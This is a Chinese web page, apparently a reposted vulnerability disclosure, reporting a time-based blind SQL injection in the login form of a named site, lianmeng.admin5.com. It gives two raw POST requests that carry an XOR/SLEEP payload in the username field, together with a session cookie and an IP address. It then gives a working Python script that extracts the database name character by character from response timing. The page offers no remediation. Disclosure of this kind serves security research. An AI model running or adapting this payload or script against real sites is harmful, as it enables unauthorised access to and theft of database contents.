【延迟注入】A5站长网某站存在SQL注入漏洞

时间:2022-05-07
本文章向大家介绍【延迟注入】A5站长网某站存在SQL注入漏洞,主要内容包括A5站长网某站存在SQL注入漏洞(附验证脚本)、详细说明:、基本概念、基础应用、原理机制和需要注意的事项等,并结合实例形式分析了其使用技巧,希望通过本文能帮助到大家理解应用这部分内容。

A5站长网某站存在SQL注入漏洞(附验证脚本)

详细说明:

code 区域

POST /Login/login HTTP/1.1
Host: lianmeng.admin5.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221c320e29cca506504514677a0d5fd96d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22210.74.157.98%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A65%3A%22Mozilla%2F5.0+%28Windows+NT+5.1%3B+rv%3A40.0%29+Gecko%2F20100101+Firefox%2F40.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1445589426%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Db420bfdef11a47e249791b34c8cf9b670d135b57; CNZZDATA1253702959=369810679-1445589126-%7C1445589126
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106

change=&password=g00dPa%24%24w0rD&username='XOR(if(now()=sysdate(),SLEEP(IF(length(database())=11,5,0)),0))OR'

延迟注入 为真时,延迟5秒,db长度为11:

为假时,不延迟:

db的第一位为l(ascii:108)

code 区域

POST /Login/login HTTP/1.1
Host: lianmeng.admin5.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221c320e29cca506504514677a0d5fd96d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22210.74.157.98%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A65%3A%22Mozilla%2F5.0+%28Windows+NT+5.1%3B+rv%3A40.0%29+Gecko%2F20100101+Firefox%2F40.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1445589426%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Db420bfdef11a47e249791b34c8cf9b670d135b57; CNZZDATA1253702959=369810679-1445589126-%7C1445589126
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

change=&password=g00dPa%24%24w0rD&username='XOR(if(now()=sysdate(),SLEEP(IF(ascii(mid(database(),1,1))=108,5,0)),0))OR'

code 区域

#encoding=utf-8

import httplib

import time

import string

import sys

import random

import urllib

import math


headers = {'Content-Type':'application/x-www-form-urlencoded'}

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print 'Start to retrive MySQL DB:'

db= ''

for i in range(1, 12):

    for payload in payloads:

            #time.sleep(5)    #5秒来一发

            s = "change=&password=g00dParD&username='XOR(if(now()=sysdate(),SLEEP(IF(ascii(mid(database(),%s,1))=%s,3,0)),0))OR'" % (i, ord(payload))

            conn = httplib.HTTPConnection('lianmeng.admin5.com', timeout=150)

            conn.request(method='POST',

                         url='/Login/login',
                         body=s,
                         headers=headers)

            start_time = time.time()

            conn.getresponse()

            conn.close()

            print '.',

            if time.time() - start_time > 3.0:

                db += payload

                print 'nn[in progress]', db,
                break
print 'nn[Done] MySQL DB is %s' % db

随机文章
本站知识点必读
最近更新